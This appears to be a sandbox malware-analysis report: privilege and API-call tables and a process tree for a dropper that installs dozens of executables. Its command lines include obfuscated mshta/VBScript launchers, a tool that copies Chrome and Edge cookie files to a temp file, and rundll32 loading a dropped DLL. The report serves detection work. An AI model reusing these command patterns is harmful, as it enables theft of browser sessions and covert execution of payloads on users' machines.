| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\7268927.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-FUI7P.tmp\9ybFKgN4WuGnce5JdPMQM3DS.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8P335.tmp\WEATHER Manager.tmp | N/A |
| N/A | N/A | C:\Program Files\Windows Defender\mpcmdrun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-GH7T6.tmp\VPN.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-552S6.tmp\Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-Q005E.tmp\tWm_pRDvAZZWNDIG3H_UEBf4.tmp | N/A |
| N/A | N/A | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (21).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (21).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv juDKImBLWkCHi9D6+osR0w.0.2
C:\Users\Admin\Documents\ZgAkNyvlSHVJ1bhgapZjpy5d.exe
"C:\Users\Admin\Documents\ZgAkNyvlSHVJ1bhgapZjpy5d.exe"
C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe
"C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe"
C:\Users\Admin\Documents\NQcQzWXtpEGKMyTl5AoE7i7S.exe
"C:\Users\Admin\Documents\NQcQzWXtpEGKMyTl5AoE7i7S.exe"
C:\Users\Admin\Documents\c5xOgFwDoAjjimlvH3cndBre.exe
"C:\Users\Admin\Documents\c5xOgFwDoAjjimlvH3cndBre.exe"
C:\Users\Admin\Documents\4IubBdzTDcB9wNt5L88OiOii.exe
"C:\Users\Admin\Documents\4IubBdzTDcB9wNt5L88OiOii.exe"
C:\Users\Admin\Documents\dFccDEsRk7gTNKAD1oSb2EAT.exe
"C:\Users\Admin\Documents\dFccDEsRk7gTNKAD1oSb2EAT.exe"
C:\Users\Admin\Documents\C5JNZApmPyOG7fYSdjZmyU5B.exe
"C:\Users\Admin\Documents\C5JNZApmPyOG7fYSdjZmyU5B.exe"
C:\Users\Admin\Documents\kQgr_CBdsxJSCe_Rc3KMmnX2.exe
"C:\Users\Admin\Documents\kQgr_CBdsxJSCe_Rc3KMmnX2.exe"
C:\Users\Admin\Documents\uIVM5UX3s2Mhr_WMWbjqOR4I.exe
"C:\Users\Admin\Documents\uIVM5UX3s2Mhr_WMWbjqOR4I.exe"
C:\Users\Admin\Documents\gXVQiH2WbjbW9J8M6og9_LRu.exe
"C:\Users\Admin\Documents\gXVQiH2WbjbW9J8M6og9_LRu.exe"
C:\Users\Admin\Documents\5nnPxINMdjkRH78PeclRzI0d.exe
"C:\Users\Admin\Documents\5nnPxINMdjkRH78PeclRzI0d.exe"
C:\Users\Admin\Documents\d1cSuepKgtvUWoz3bgL2bjmy.exe
"C:\Users\Admin\Documents\d1cSuepKgtvUWoz3bgL2bjmy.exe"
C:\Users\Admin\Documents\_aS69HCqYfasr2anZXWD9l51.exe
"C:\Users\Admin\Documents\_aS69HCqYfasr2anZXWD9l51.exe"
C:\Users\Admin\Documents\u_YM_sbCBf_xkidDex2YnJ9T.exe
"C:\Users\Admin\Documents\u_YM_sbCBf_xkidDex2YnJ9T.exe"
C:\Users\Admin\Documents\YtcGX4jqiLU53KrqLal5jS2e.exe
"C:\Users\Admin\Documents\YtcGX4jqiLU53KrqLal5jS2e.exe"
C:\Users\Admin\Documents\6SGgH6drewLSSJUPUj1P7jm0.exe
"C:\Users\Admin\Documents\6SGgH6drewLSSJUPUj1P7jm0.exe"
C:\Users\Admin\Documents\_SCmzGdU7N9jwGUMFYfs5jBb.exe
"C:\Users\Admin\Documents\_SCmzGdU7N9jwGUMFYfs5jBb.exe"
C:\Users\Admin\Documents\UifkURBfFsQbjvFeBdjqzVHl.exe
"C:\Users\Admin\Documents\UifkURBfFsQbjvFeBdjqzVHl.exe"
C:\Users\Admin\Documents\6rL3_fn_t8rgw1FDRsoDuuaz.exe
"C:\Users\Admin\Documents\6rL3_fn_t8rgw1FDRsoDuuaz.exe"
C:\Users\Admin\Documents\Eau0YHEujefu64_rj4_1bvaB.exe
"C:\Users\Admin\Documents\Eau0YHEujefu64_rj4_1bvaB.exe"
C:\Users\Admin\Documents\BZM2yXS9Qpj0LBwXhHUiqHRE.exe
"C:\Users\Admin\Documents\BZM2yXS9Qpj0LBwXhHUiqHRE.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\Documents\Oe88DJ3T4iLGbzGvVo7dJ4a5.exe
"C:\Users\Admin\Documents\Oe88DJ3T4iLGbzGvVo7dJ4a5.exe"
C:\Users\Admin\Documents\R9hzi1rG28yqaIQZUAUwxXPx.exe
"C:\Users\Admin\Documents\R9hzi1rG28yqaIQZUAUwxXPx.exe"
C:\Users\Admin\Documents\pAAqtr00joMYIGWMKHR4PyBW.exe
"C:\Users\Admin\Documents\pAAqtr00joMYIGWMKHR4PyBW.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\4IubBdzTDcB9wNt5L88OiOii.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\4IubBdzTDcB9wNt5L88OiOii.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\Documents\9ybFKgN4WuGnce5JdPMQM3DS.exe
"C:\Users\Admin\Documents\9ybFKgN4WuGnce5JdPMQM3DS.exe"
C:\Users\Admin\Documents\10AcJNkqNad6MaQczsUO18S0.exe
"C:\Users\Admin\Documents\10AcJNkqNad6MaQczsUO18S0.exe"
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4572 -ip 4572
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Users\Admin\AppData\Local\Temp\is-FUI7P.tmp\9ybFKgN4WuGnce5JdPMQM3DS.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FUI7P.tmp\9ybFKgN4WuGnce5JdPMQM3DS.tmp" /SL5="$F0230,138429,56832,C:\Users\Admin\Documents\9ybFKgN4WuGnce5JdPMQM3DS.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4572 -s 320
C:\Users\Admin\Documents\5nnPxINMdjkRH78PeclRzI0d.exe
C:\Users\Admin\Documents\5nnPxINMdjkRH78PeclRzI0d.exe
C:\Users\Admin\Documents\BZM2yXS9Qpj0LBwXhHUiqHRE.exe
C:\Users\Admin\Documents\BZM2yXS9Qpj0LBwXhHUiqHRE.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\4IubBdzTDcB9wNt5L88OiOii.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\4IubBdzTDcB9wNt5L88OiOii.exe" ) do taskkill -f -iM "%~NxA"
C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe
"C:\Users\Admin\Documents\4_hzqRqVs10KTU3sNHLWO1em.exe"
C:\Users\Admin\Documents\Pn1VVo1T_hse7zpU6N5O7Ppu.exe
"C:\Users\Admin\Documents\Pn1VVo1T_hse7zpU6N5O7Ppu.exe"
C:\Users\Admin\Documents\6rL3_fn_t8rgw1FDRsoDuuaz.exe
C:\Users\Admin\Documents\6rL3_fn_t8rgw1FDRsoDuuaz.exe
C:\Users\Admin\Documents\UifkURBfFsQbjvFeBdjqzVHl.exe
"C:\Users\Admin\Documents\UifkURBfFsQbjvFeBdjqzVHl.exe" -q
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1188 -ip 1188
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3952 -ip 3952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5012 -ip 5012
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1052 -ip 1052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 3252 -ip 3252
C:\Users\Admin\Documents\6rL3_fn_t8rgw1FDRsoDuuaz.exe
C:\Users\Admin\Documents\6rL3_fn_t8rgw1FDRsoDuuaz.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 2736 -ip 2736
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1052 -s 296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 2236 -ip 2236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 280
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 4056 -ip 4056
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5012 -s 316
C:\Users\Admin\AppData\Roaming\3857461.exe
"C:\Users\Admin\AppData\Roaming\3857461.exe"
C:\Users\Admin\Documents\c5xOgFwDoAjjimlvH3cndBre.exe
"C:\Users\Admin\Documents\c5xOgFwDoAjjimlvH3cndBre.exe"
C:\Users\Admin\AppData\Roaming\3639688.exe
"C:\Users\Admin\AppData\Roaming\3639688.exe"
C:\Users\Admin\AppData\Roaming\5594086.exe
"C:\Users\Admin\AppData\Roaming\5594086.exe"
C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
C:\Users\Admin\AppData\Roaming\7268927.exe
"C:\Users\Admin\AppData\Roaming\7268927.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "4IubBdzTDcB9wNt5L88OiOii.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 680 -ip 680
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2820 -ip 2820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 276
C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-PSA31.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " =="" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 288
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
C:\Users\Admin\AppData\Local\Temp\is-8P335.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8P335.tmp\WEATHER Manager.tmp" /SL5="$20328,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-LNOE4.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LNOE4.tmp\Inlog.tmp" /SL5="$20392,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\is-GH7T6.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GH7T6.tmp\VPN.tmp" /SL5="$3039C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Users\Admin\AppData\Local\Temp\is-GA0F5.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GA0F5.tmp\MediaBurner2.tmp" /SL5="$20334,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\is-HPVFQ.tmp\3377047_logo_media.exe
"C:\Users\Admin\AppData\Local\Temp\is-HPVFQ.tmp\3377047_logo_media.exe" /S /UID=burnerch2
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5188 -ip 5188
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\5597475.exe
"C:\Users\Admin\AppData\Roaming\5597475.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5188 -s 292
C:\Users\Admin\AppData\Roaming\4402502.exe
"C:\Users\Admin\AppData\Roaming\4402502.exe"
C:\Users\Admin\AppData\Roaming\1532688.exe
"C:\Users\Admin\AppData\Roaming\1532688.exe"
C:\Users\Admin\AppData\Roaming\8084573.exe
"C:\Users\Admin\AppData\Roaming\8084573.exe"
C:\Users\Admin\AppData\Roaming\3067750.exe
"C:\Users\Admin\AppData\Roaming\3067750.exe"
C:\Users\Admin\AppData\Local\Temp\tmpA8B_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpA8B_tmp.exe"
C:\Users\Admin\AppData\Local\Temp\is-552S6.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-552S6.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Users\Admin\Documents\lMRrZ8za0XNxp4HVQbeIHCR5.exe
"C:\Users\Admin\Documents\lMRrZ8za0XNxp4HVQbeIHCR5.exe"
C:\Users\Admin\Documents\PVug0jmF2Eu5brLpRJvXd80e.exe
"C:\Users\Admin\Documents\PVug0jmF2Eu5brLpRJvXd80e.exe"
C:\Users\Admin\Documents\MkQEUdYdZt91PK1nMLyyiXOT.exe
"C:\Users\Admin\Documents\MkQEUdYdZt91PK1nMLyyiXOT.exe"
C:\Users\Admin\Documents\nccW3LP_L5VPMq0je0USgUGw.exe
"C:\Users\Admin\Documents\nccW3LP_L5VPMq0je0USgUGw.exe"
C:\Users\Admin\Documents\uguJFTpr2ecVg9tFI6_hZARF.exe
"C:\Users\Admin\Documents\uguJFTpr2ecVg9tFI6_hZARF.exe"
C:\Users\Admin\Documents\rprg2L7hJ3c2hQV9lB20d1Ur.exe
"C:\Users\Admin\Documents\rprg2L7hJ3c2hQV9lB20d1Ur.exe"
C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe
"C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe"
C:\Users\Admin\Documents\re1Hhy31txL4H3hNkEpiD2FT.exe
"C:\Users\Admin\Documents\re1Hhy31txL4H3hNkEpiD2FT.exe"
C:\Users\Admin\Documents\dSJ1DLp8BjVryE14P2zNmv2P.exe
"C:\Users\Admin\Documents\dSJ1DLp8BjVryE14P2zNmv2P.exe"
C:\Users\Admin\Documents\tWm_pRDvAZZWNDIG3H_UEBf4.exe
"C:\Users\Admin\Documents\tWm_pRDvAZZWNDIG3H_UEBf4.exe"
C:\Users\Admin\Documents\O1BpwHdvsKnYoUztJHZYVdgB.exe
"C:\Users\Admin\Documents\O1BpwHdvsKnYoUztJHZYVdgB.exe"
C:\Users\Admin\Documents\em1B_6scYxoZ74gMl4nvPl6e.exe
"C:\Users\Admin\Documents\em1B_6scYxoZ74gMl4nvPl6e.exe"
C:\Users\Admin\AppData\Local\Temp\is-Q005E.tmp\tWm_pRDvAZZWNDIG3H_UEBf4.tmp
"C:\Users\Admin\AppData\Local\Temp\is-Q005E.tmp\tWm_pRDvAZZWNDIG3H_UEBf4.tmp" /SL5="$10508,138429,56832,C:\Users\Admin\Documents\tWm_pRDvAZZWNDIG3H_UEBf4.exe"
C:\Users\Admin\Documents\L5KufeDyDc_0Xbqzjg48xHo9.exe
"C:\Users\Admin\Documents\L5KufeDyDc_0Xbqzjg48xHo9.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\knGF2FT1BmSogNGvLPrQyPnY.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\knGF2FT1BmSogNGvLPrQyPnY.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )
C:\Users\Admin\Documents\CzJr35j0AgQKdDStn6LUHdGO.exe
"C:\Users\Admin\Documents\CzJr35j0AgQKdDStn6LUHdGO.exe"
C:\Users\Admin\Documents\TyKmaTLXXQxaR793W4KjPEoi.exe
"C:\Users\Admin\Documents\TyKmaTLXXQxaR793W4KjPEoi.exe"
C:\Users\Admin\Documents\pwyIFxlcMhdwsR3wLrcsfQXl.exe
"C:\Users\Admin\Documents\pwyIFxlcMhdwsR3wLrcsfQXl.exe"
C:\Users\Admin\Documents\YroXK6C6n11mNO4Za0OdPbQ4.exe
"C:\Users\Admin\Documents\YroXK6C6n11mNO4Za0OdPbQ4.exe"
C:\Users\Admin\Documents\WJwaJXhBwGo9_dvnNCZRBFvv.exe
"C:\Users\Admin\Documents\WJwaJXhBwGo9_dvnNCZRBFvv.exe"
C:\Users\Admin\Documents\enCHWnnm4x73H0AymPSbZMk_.exe
"C:\Users\Admin\Documents\enCHWnnm4x73H0AymPSbZMk_.exe"
C:\Users\Admin\Documents\Qnqphm6SOYhH73CSsJ4bFUPP.exe
"C:\Users\Admin\Documents\Qnqphm6SOYhH73CSsJ4bFUPP.exe"
C:\Users\Admin\Documents\rY4B02mFx7NsjTURuMXhJ5V5.exe
"C:\Users\Admin\Documents\rY4B02mFx7NsjTURuMXhJ5V5.exe"
C:\Users\Admin\Documents\jNnYNY2SNFMOQI8N7SNnyWE9.exe
"C:\Users\Admin\Documents\jNnYNY2SNFMOQI8N7SNnyWE9.exe"
C:\Users\Admin\Documents\knGF2FT1BmSogNGvLPrQyPnY.exe
"C:\Users\Admin\Documents\knGF2FT1BmSogNGvLPrQyPnY.exe"
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\Documents\_WMhMST71Jr3oHV36_l5VqlX.exe
"C:\Users\Admin\Documents\_WMhMST71Jr3oHV36_l5VqlX.exe"
C:\Users\Admin\Documents\A6o6pZTNBojODUhHSWTXq0vu.exe
"C:\Users\Admin\Documents\A6o6pZTNBojODUhHSWTXq0vu.exe"
C:\Users\Admin\Documents\CG_WBckl49PYaVOZVSSrFc3b.exe
"C:\Users\Admin\Documents\CG_WBckl49PYaVOZVSSrFc3b.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\knGF2FT1BmSogNGvLPrQyPnY.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\knGF2FT1BmSogNGvLPrQyPnY.exe" ) do taskkill -f -iM "%~NxA"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5504 -ip 5504
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 6188 -ip 6188
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "knGF2FT1BmSogNGvLPrQyPnY.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 576 -p 1300 -ip 1300
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5504 -s 1768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 316
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\AppData\Local\Temp\7413.exe
C:\Users\Admin\AppData\Local\Temp\7413.exe
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4672 -ip 4672
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6992 -ip 6992
C:\Windows\SysWOW64\WerFault.exe
